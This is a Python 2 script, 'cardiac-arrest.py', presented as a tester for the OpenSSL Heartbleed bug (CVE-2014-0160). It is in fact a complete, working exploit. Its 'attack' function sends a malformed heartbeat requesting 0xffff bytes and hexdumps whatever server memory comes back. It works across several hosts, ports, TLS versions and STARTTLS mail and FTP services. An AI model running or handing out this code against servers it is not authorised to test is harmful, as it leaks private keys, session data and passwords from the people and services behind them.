cardiac-arrest.py

1. #!/usr/bin/python
2.  
3. # Hut3 Cardiac Arrest - A script to check OpenSSL servers for the Heartbleed bug (CVE-2014-0160).
4. #
5. # DISCLAIMER: There have been unconfirmed reports that this script can render HP iLO unresponsive.
6. # This script complies with the TLS specification, so responsitivity issues are likely the result
7. # of a bad implementation of TLS on the server side. CNS Hut3 and Adrian Hayter do not accept
8. # responsibility if this script crashes a server you test it against. USE IT AT YOUR OWN RISK.
9. # As always, the correct way to test for the vulnerability is to check the version of OpenSSL
10. # installed on the server in question. OpenSSL 1.0.1 through 1.0.1f are vulnerable.
11. #
12. # This script has several advantages over similar scripts that have been released,
13. # including a larger list of supported TLS cipher suites, support for multiple TLS
14. # protocol versions (including SSLv3 since some configurations leak memory when
15. # SSLv3 is used). Multiple ports / hosts can be tested at once, and limited
16. # STARTTLS support is included.
17. #
18. #
19. # Examples:
20. #
21. # Test all SSL/TLS protocols against 192.168.0.1 and 192.168.0.2 on ports 443 and 8443:
22. #
23. #    python heartattack.py -p 443,8443 192.168.0.1 192.168.0.2
24. #
25. # Test the TLSv1.2 protocol against 192.168.0.1 using SMTP STARTTLS on port 25:
26. #
27. #    python heartattack.py -s smtp -p 25 -V TLSv1.2 192.168.0.1
28. #
29. #
30. # Several sections of code have been lifted from other detection scripts and
31. # modified to make them more efficient. Sources include but are likely not limited to:
32. #
33. # https://bitbucket.org/johannestaas/heartattack (johannestaas@gmail.com)
34. # https://gist.github.com/takeshixx/10107280 (takeshix@adversec.com)
35. #
36. # Like other authors of Heartbleed scripts, I disclaim copyright to this source code.
37.  
38. import sys
39. import struct
40. import socket
41. import time
42. import select
43. import re
44. import argparse
45. import random
46. import string
47.  
48. num_bytes_per_line = 16
49. display_null_bytes = False
50. verbose = False
51.  
52. starttls_options = ['none', 'smtp', 'pop3', 'imap', 'ftp']
53. protocol_hex_to_name = {0x00:'SSLv3', 0x01:'TLSv1.0', 0x02:'TLSv1.1', 0x03:'TLSv1.2'}
54. protocol_name_to_hex = dict(reversed(item) for item in protocol_hex_to_name.items())
55.  
56. alert_levels = {0x01:'warning', 0x02:'fatal'}
57. alert_descriptions = {0x00:'Close notify', 0x0a:'Unexpected message', 0x14:'Bad record MAC', 0x15:'Decryption failed', 0x16:'Record overflow ', 0x1e:'Decompression failure', 0x28:'Handshake failure', 0x29:'No certificate', 0x2a:'Bad certificate', 0x2b:'Unsupported certificate', 0x2c:'Certificate revoked', 0x2d:'Certificate expired', 0x2e:'Certificate unknown', 0x2f:'Illegal parameter', 0x30:'Unknown CA', 0x31:'Access denied', 0x32:'Decode error', 0x33:'Decrypt error', 0x3c:'Export restriction', 0x46:'Protocol version', 0x47:'Insufficient security', 0x50:'Internal error', 0x5a:'User canceled', 0x64:'No renegotiation', 0x6e:'Unsupported extension', 0x6f:'Certificate unobtainable', 0x70:'Unrecognized name', 0x71:'Bad certificate status response', 0x72:'Bad certificate hash value', 0x73:'Unknown PSK identity'}
58.  
59. buffer_size = 1024
60.  
61. def rand(size=10, chars=string.letters + string.digits):
62.     return ''.join(random.choice(chars) for _ in range(size))
63.  
64. def hexdump(s):
65.     s = str(s)
66.     for b in xrange(0, len(s), num_bytes_per_line):
67.         lin = [c for c in s[b : b + num_bytes_per_line]]
68.         hxdat = ' '.join('%02X' % ord(c) for c in lin)
69.         pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
70.         if pdat:
71.             if display_null_bytes:
72.                 print '  %04x: %-48s %s' % (b, hxdat, pdat)
73.             elif not re.match('^\.{' + str(num_bytes_per_line) + '}$', pdat):
74.                 print '  %04x: %-48s %s' % (b, hxdat, pdat)
75.     sys.stdout.flush()
76.  
77. def hex2bin(arr):
78.     return ''.join('{0:02x}'.format(x) for x in arr).decode('hex')
79.  
80. def gen_clienthello(v):
81.     return hex2bin([0x16, 0x03, v, 0x02, 0xf2, 0x01, 0x00, 0x02, 0xee, 0x03, v, 0x53, 0x48, 0x73, 0xf0, 0x7c, 0xca, 0xc1, 0xd9, 0x02, 0x04, 0xf2, 0x1d, 0x2d, 0x49, 0xf5, 0x12, 0xbf, 0x40, 0x1b, 0x94, 0xd9, 0x93, 0xe4, 0xc4, 0xf4, 0xf0, 0xd0, 0x42, 0xcd, 0x44, 0xa2, 0x59,0x00, 0x02, 0x7c, 0x00, 0x00, 0x00, 0x01, 0x00, 0x02, 0x00, 0x03, 0x00, 0x04, 0x00, 0x05, 0x00, 0x06, 0x00, 0x07, 0x00, 0x08, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x0b, 0x00, 0x0c, 0x00, 0x0d, 0x00, 0x0e, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11, 0x00, 0x12, 0x00, 0x13, 0x00, 0x14, 0x00, 0x15, 0x00, 0x16, 0x00, 0x17, 0x00, 0x18, 0x00, 0x19, 0x00, 0x1a, 0x00, 0x1b, 0x00, 0x1e, 0x00, 0x1f, 0x00, 0x20, 0x00, 0x21, 0x00, 0x22, 0x00, 0x23, 0x00, 0x24, 0x00, 0x25, 0x00, 0x26, 0x00, 0x27, 0x00, 0x28, 0x00, 0x29, 0x00, 0x2a, 0x00, 0x2b, 0x00, 0x2c, 0x00, 0x2d, 0x00, 0x2e, 0x00, 0x2f, 0x00, 0x30, 0x00, 0x31, 0x00, 0x32, 0x00, 0x33, 0x00, 0x34, 0x00, 0x35, 0x00, 0x36, 0x00, 0x37, 0x00, 0x38, 0x00, 0x39, 0x00, 0x3a, 0x00, 0x3b, 0x00, 0x3c, 0x00, 0x3d, 0x00, 0x3e, 0x00, 0x3f, 0x00, 0x40, 0x00, 0x41, 0x00, 0x42, 0x00, 0x43, 0x00, 0x44, 0x00, 0x45, 0x00, 0x46, 0x00, 0x67, 0x00, 0x68, 0x00, 0x69, 0x00, 0x6a, 0x00, 0x6b, 0x00, 0x6c, 0x00, 0x6d, 0x00, 0x84, 0x00, 0x85, 0x00, 0x86, 0x00, 0x87, 0x00, 0x88, 0x00, 0x89, 0x00, 0x8a, 0x00, 0x8b, 0x00, 0x8c, 0x00, 0x8d, 0x00, 0x8e, 0x00, 0x8f, 0x00, 0x90, 0x00, 0x91, 0x00, 0x92, 0x00, 0x93, 0x00, 0x94, 0x00, 0x95, 0x00, 0x96, 0x00, 0x97, 0x00, 0x98, 0x00, 0x99, 0x00, 0x9a, 0x00, 0x9b, 0x00, 0x9c, 0x00, 0x9d, 0x00, 0x9e, 0x00, 0x9f, 0x00, 0xa0, 0x00, 0xa1, 0x00, 0xa2, 0x00, 0xa3, 0x00, 0xa4, 0x00, 0xa5, 0x00, 0xa6, 0x00, 0xa7, 0x00, 0xa8, 0x00, 0xa9, 0x00, 0xaa, 0x00, 0xab, 0x00, 0xac, 0x00, 0xad, 0x00, 0xae, 0x00, 0xaf, 0x00, 0xb0, 0x00, 0xb1, 0x00, 0xb2, 0x00, 0xb3, 0x00, 0xb4, 0x00, 0xb5, 0x00, 0xb6, 0x00, 0xb7, 0x00, 0xb8, 0x00, 0xb9, 0x00, 0xba, 0x00, 0xbb, 0x00, 0xbc, 0x00, 0xbd, 0x00, 0xbe, 0x00, 0xbf, 0x00, 0xc0, 0x00, 0xc1, 0x00, 0xc2, 0x00, 0xc3, 0x00, 0xc4, 0x00, 0xc5, 0x00, 0xff, 0xc0, 0x01, 0xc0, 0x02, 0xc0, 0x03, 0xc0, 0x04, 0xc0, 0x05, 0xc0, 0x06, 0xc0, 0x07, 0xc0, 0x08, 0xc0, 0x09, 0xc0, 0x0a, 0xc0, 0x0b, 0xc0, 0x0c, 0xc0, 0x0d, 0xc0, 0x0e, 0xc0, 0x0f, 0xc0, 0x10, 0xc0, 0x11, 0xc0, 0x12, 0xc0, 0x13, 0xc0, 0x14, 0xc0, 0x15, 0xc0, 0x16, 0xc0, 0x17, 0xc0, 0x18, 0xc0, 0x19, 0xc0, 0x1a, 0xc0, 0x1b, 0xc0, 0x1c, 0xc0, 0x1d, 0xc0, 0x1e, 0xc0, 0x1f, 0xc0, 0x20, 0xc0, 0x21, 0xc0, 0x22, 0xc0, 0x23, 0xc0, 0x24, 0xc0, 0x25, 0xc0, 0x26, 0xc0, 0x27, 0xc0, 0x28, 0xc0, 0x29, 0xc0, 0x2a, 0xc0, 0x2b, 0xc0, 0x2c, 0xc0, 0x2d, 0xc0, 0x2e, 0xc0, 0x2f, 0xc0, 0x30, 0xc0, 0x31, 0xc0, 0x32, 0xc0, 0x33, 0xc0, 0x34, 0xc0, 0x35, 0xc0, 0x36, 0xc0, 0x37, 0xc0, 0x38, 0xc0, 0x39, 0xc0, 0x3a, 0xc0, 0x3b, 0xc0, 0x3c, 0xc0, 0x3d, 0xc0, 0x3e, 0xc0, 0x3f, 0xc0, 0x40, 0xc0, 0x41, 0xc0, 0x42, 0xc0, 0x43, 0xc0, 0x44, 0xc0, 0x45, 0xc0, 0x46, 0xc0, 0x47, 0xc0, 0x48, 0xc0, 0x49, 0xc0, 0x4a, 0xc0, 0x4b, 0xc0, 0x4c, 0xc0, 0x4d, 0xc0, 0x4e, 0xc0, 0x4f, 0xc0, 0x50, 0xc0, 0x51, 0xc0, 0x52, 0xc0, 0x53, 0xc0, 0x54, 0xc0, 0x55, 0xc0, 0x56, 0xc0, 0x57, 0xc0, 0x58, 0xc0, 0x59, 0xc0, 0x5a, 0xc0, 0x5b, 0xc0, 0x5c, 0xc0, 0x5d, 0xc0, 0x5e, 0xc0, 0x5f, 0xc0, 0x60, 0xc0, 0x61, 0xc0, 0x62, 0xc0, 0x63, 0xc0, 0x64, 0xc0, 0x65, 0xc0, 0x66, 0xc0, 0x67, 0xc0, 0x68, 0xc0, 0x69, 0xc0, 0x6a, 0xc0, 0x6b, 0xc0, 0x6c, 0xc0, 0x6d, 0xc0, 0x6e, 0xc0, 0x6f, 0xc0, 0x70, 0xc0, 0x71, 0xc0, 0x72, 0xc0, 0x73, 0xc0, 0x74, 0xc0, 0x75, 0xc0, 0x76, 0xc0, 0x77, 0xc0, 0x78, 0xc0, 0x79, 0xc0, 0x7a, 0xc0, 0x7b, 0xc0, 0x7c, 0xc0, 0x7d, 0xc0, 0x7e, 0xc0, 0x7f, 0xc0, 0x80, 0xc0, 0x81, 0xc0, 0x82, 0xc0, 0x83, 0xc0, 0x84, 0xc0, 0x85, 0xc0, 0x86, 0xc0, 0x87, 0xc0, 0x88, 0xc0, 0x89, 0xc0, 0x8a, 0xc0, 0x8b, 0xc0, 0x8c, 0xc0, 0x8d, 0xc0, 0x8e, 0xc0, 0x8f, 0xc0, 0x90, 0xc0, 0x91, 0xc0, 0x92, 0xc0, 0x93, 0xc0, 0x94, 0xc0, 0x95, 0xc0, 0x96, 0xc0, 0x97, 0xc0, 0x98, 0xc0, 0x99, 0xc0, 0x9a, 0xc0, 0x9b, 0xc0, 0x9c, 0xc0, 0x9d, 0xc0, 0x9e, 0xc0, 0x9f, 0xc0, 0xa0, 0xc0, 0xa1, 0xc0, 0xa2, 0xc0, 0xa3, 0xc0, 0xa4, 0xc0, 0xa5, 0xc0, 0xa6, 0xc0, 0xa7, 0xc0, 0xa8, 0xc0, 0xa9, 0xc0, 0xaa, 0xc0, 0xab, 0xc0, 0xac, 0xc0, 0xad, 0xc0, 0xae, 0xc0, 0xaf,0x01, 0x00, 0x00, 0x49, 0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,0x00, 0x23, 0x00, 0x00,0x00, 0x0f, 0x00, 0x01, 0x01])
82.  
83. def gen_heartbeat(v):
84.     return hex2bin([0x18, 0x03, v, 0x00, 0x03, 0x01, 0xff, 0xff])
85.  
86. def recvall(s, length, timeout=5):
87.     end = time.time() + timeout
88.     rdata = ''
89.     while length > 0:
90.         ready = select.select([s], [], [], 1)
91.         if ready[0]:
92.             data = s.recv(length)
93.             if not data:
94.                 break
95.             leng = len(data)
96.             rdata += data
97.             if time.time() > end:
98.                 break
99.             length -= leng
100.         else:
101.             if time.time() > end:
102.                 break
103.     return rdata
104.  
105. def recvmsg(s, timeout=5):
106.     hdr = recvall(s, 5, timeout)
107.     if hdr is None:
108.         return None, None, None
109.     elif len(hdr) == 5:
110.         type, version, length = struct.unpack('>BHH', hdr)
111.         payload = recvall(s, length, timeout)
112.         if payload is None:
113.             return type, version, None
114.     else:
115.         return None, None, None
116.     return type, version, payload
117.  
118. def attack(ip, port, tlsversion, starttls='none', timeout=5):
119.     tlslongver = protocol_hex_to_name[tlsversion]
120.    
121.     if starttls == 'none':
122.         print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver
123.     else:
124.         print '[INFO] Connecting to ' + str(ip) + ':' + str(port) + ' using ' + tlslongver + ' with STARTTLS'
125.     sys.stdout.flush()
126.    
127.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
128.     s.settimeout(timeout)
129.    
130.     try:
131.         s.connect((ip, port))
132.        
133.         if starttls == 'smtp':
134.             recvall(s, buffer_size)
135.             s.send('ehlo ' + rand(10) + '\n')
136.             res = recvall(s, buffer_size)
137.             if not 'STARTTLS' in res:
138.                 print >> sys.stderr, '\033[93m[ERROR] STARTTLS does not appear to be supported.\033[0m\n'
139.                 sys.stderr.flush()
140.                 return False
141.             s.send('starttls\n')
142.             recvall(s, buffer_size)
143.         elif starttls == 'pop3':
144.             recvall(s, buffer_size)
145.             s.send("STLS\n")
146.             recvall(s, buffer_size)
147.         elif starttls == 'imap':
148.             recvall(s, buffer_size)
149.             s.send("STARTTLS\n")
150.             recvall(s, buffer_size)
151.         elif starttls == 'ftp':
152.             recvall(s, buffer_size)
153.             s.send("AUTH TLS\n")
154.             recvall(s, buffer_size)
155.        
156.         s.send(gen_clienthello(tlsversion))
157.        
158.         while True:
159.             type, version, payload = recvmsg(s, timeout)
160.             if type is None:
161.                 print >> sys.stderr, '\033[93m[ERROR] The server closed the connection without sending the ServerHello. This might mean the server does not support ' + tlslongver + ' or it might not support SSL/TLS at all.\033[0m\n'
162.                 sys.stderr.flush()
163.                 return False
164.             elif type == 22 and ord(payload[0]) == 0x0E:
165.                 break
166.        
167.         s.send(gen_heartbeat(tlsversion))
168.        
169.         while True:
170.             type, version, payload = recvmsg(s, timeout)
171.             if type is None:
172.                 print '[INFO] No heartbeat response was received. The server is probably not vulnerable.\n'
173.                 sys.stdout.flush()
174.                 return False
175.            
176.             if type == 24:
177.                 if len(payload) > 3:
178.                     print '\033[91m\033[1m[FAIL] Heartbeat response was ' + str(len(payload)) + ' bytes instead of 3! ' + str(ip) + ':' + str(port) + ' is vulnerable over ' + tlslongver + '\033[0m'
179.                     if display_null_bytes:
180.                         print '[INFO] Displaying response:'
181.                     else:
182.                         print '[INFO] Displaying response (lines consisting entirely of null bytes are removed):'
183.                     print ''
184.                     sys.stdout.flush()
185.                     hexdump(payload)
186.                     print ''
187.                     return True
188.                 else:
189.                     print '[INFO] The server processed the malformed heartbeat, but did not return any extra data.\n'
190.                     sys.stdout.flush()
191.                     return False
192.            
193.             if type == 21:
194.                 print '[INFO] The server received an alert. It is likely not vulnerable.'
195.                 if verbose: print '[INFO] Alert Level: ' + alert_levels[ord(payload[0])]
196.                 if verbose: print '[INFO] Alert Description: ' + alert_descriptions[ord(payload[1])] + ' (see RFC 5246 section 7.2)'
197.                 print ''
198.                 sys.stdout.flush()
199.                 return False
200.        
201.         hexdump(payload)
202.        
203.         socket.close()
204.     except socket.error as e:
205.         print >> sys.stderr, '\033[93m[ERROR] Connection error. The port might not be open on the host.\033[0m\n'
206.         sys.stderr.flush()
207.         return False
208.  
209. def main():
210.     global bytes, display_null_bytes, verbose
211.    
212.     parser = argparse.ArgumentParser()
213.     parser.add_argument('-p', '--ports', type=str, default='443', help='Comma separated list of ports to check (default: 443)')
214.     parser.add_argument('-s', '--starttls', type=str, default='none', help='Use STARTTLS to upgrade the plaintext connection to SSL/TLS. Valid values: none, smtp, pop3, imap, ftp (default: none)')
215.     parser.add_argument('-t', '--timeout', type=int, default=5, help='Connection timeout in seconds (default: 5)')
216.     parser.add_argument('-b', '--bytes', type=int, default=16, help='Number of leaked bytes to display per line (default 16)')
217.     parser.add_argument('-n', '--null-bytes', action='store_true', default=False, help='Display lines consisting entirely of null bytes (default: False)')
218.     parser.add_argument('-a', '--all-versions', action='store_true', default=False, help='Continue testing all versions of SSL/TLS even if the server is found to be vulnerable (default: False)')
219.     parser.add_argument('-V', '--version', type=str, default='all', help='Comma separated list of SSL/TLS versions to check. Valid values: SSLv3, TLSv1.0, TLSv1.1, TLSv1.2')
220.     parser.add_argument('-v', '--verbose', action='store_true', default=False, help='Verbose output.')
221.     parser.add_argument('hosts', metavar='host', nargs='+', help='A host to scan.')
222.     args = parser.parse_args()
223.    
224.     args.starttls = args.starttls.lower()
225.     if args.starttls not in starttls_options:
226.         print >> sys.stderr, '\033[93m[ERROR] Invalid STARTTLS value. Valid values: none, smtp, pop3, imap, ftp.\033[0m\n'
227.         parser.print_help()
228.         sys.exit(1)
229.    
230.     bytes = args.bytes
231.     display_null_bytes = args.null_bytes
232.     verbose = args.verbose
233.    
234.     versions = []
235.     for v in [x.strip() for x in args.version.split(',')]:
236.         if v:
237.             versions.append(v)
238.    
239.     if 'all' not in versions:
240.         for v in versions:
241.             if v not in protocol_name_to_hex:
242.                 print >> sys.stderr, '\033[93m[ERROR] Invalid SSL/TLS version(s). Valid values: SSLv3, TLSv1.0, TLSv1.1, TLSv1.2.\033[0m\n'
243.                 parser.print_help()
244.                 sys.exit(1)
245.    
246.     ports = args.ports.split(',')
247.     ports = list(map(int, ports))
248.    
249.     hosts = []
250.    
251.     for h in args.hosts:
252.         for h2 in h.split(','):
253.             h2 = h2.strip()
254.             if h2:
255.                 hosts.append(h2)
256.    
257.     for host in hosts:
258.         try:
259.             ip = socket.gethostbyname(host)
260.         except socket.gaierror as e:
261.             print '[INFO] Testing: ' + host
262.             print >> sys.stderr, '\033[93m[ERROR] Could not resolve an IP address for the given host.\033[0m\n'
263.             sys.stderr.flush()
264.             continue
265.        
266.         if ip == host:
267.             print '[INFO] Testing: ' + host + '\n'
268.         else:
269.             print '[INFO] Testing: ' + host + ' (' + str(ip) + ')\n'
270.         sys.stdout.flush()
271.        
272.         for port in ports:
273.             if 'all' in versions:
274.                 if (args.all_versions):
275.                     ssl30 = attack(ip, port, 0x00, starttls=args.starttls, timeout=args.timeout)
276.                     tls10 = attack(ip, port, 0x01, starttls=args.starttls, timeout=args.timeout)
277.                     tls11 = attack(ip, port, 0x02, starttls=args.starttls, timeout=args.timeout)
278.                     tls12 = attack(ip, port, 0x03, starttls=args.starttls, timeout=args.timeout)
279.                    
280.                     if not ssl30 and not tls10 and not tls11 and not tls12:
281.                         if ip == host:
282.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
283.                         else:
284.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) +') does not appear to be vulnerable to Heartbleed!\033[0m\n'
285.                         sys.stdout.flush()
286.                 else:
287.                     if not attack(ip, port, 0x00, starttls=args.starttls, timeout=args.timeout):
288.                         if not attack(ip, port, 0x01, starttls=args.starttls, timeout=args.timeout):
289.                             if not attack(ip, port, 0x02, starttls=args.starttls, timeout=args.timeout):
290.                                 if not attack(ip, port, 0x03, starttls=args.starttls, timeout=args.timeout):
291.                                     if ip == host:
292.                                         print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
293.                                     else:
294.                                         print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
295.                                     sys.stdout.flush()
296.             else:
297.                 if (args.all_versions):
298.                     vulnerable = []
299.                     for v in versions:
300.                         if attack(ip, port, protocol_name_to_hex[v], starttls=args.starttls, timeout=args.timeout):
301.                             vulnerable.append(True)
302.                     if True not in vulnerable:
303.                         if ip == host:
304.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
305.                         else:
306.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
307.                         sys.stdout.flush()
308.                 else:
309.                     vulnerable = True
310.                     for v in versions:
311.                         vulnerable = attack(ip, port, protocol_name_to_hex[v], starttls=args.starttls, timeout=args.timeout)
312.                         if vulnerable:
313.                             break
314.                         else:
315.                             continue
316.                     if not vulnerable:
317.                         if ip == host:
318.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' does not appear to be vulnerable to Heartbleed!\033[0m\n'
319.                         else:
320.                             print '\033[1m[PASS] ' + host + ':' + str(port) + ' (' + str(ip) + ':' + str(port) + ') does not appear to be vulnerable to Heartbleed!\033[0m\n'
321.                         sys.stdout.flush()
322.  
323. if __name__ == '__main__':
324.     main()